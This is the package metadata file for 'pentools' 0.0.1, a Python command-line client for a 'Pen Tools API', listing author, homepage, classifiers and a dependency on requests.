Metadata-Version: 2.1
Name: pentools
Version: 0.0.1
Summary: CLI for Pen Tools API
Home-page: https://github.com/sarartur/pentools/tree/master/clients/python
Author: Artur Saradzhyan
Author-email: sartur.ruk@gmail.com
License: UNKNOWN
Platform: UNKNOWN
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
Requires-Dist: requests
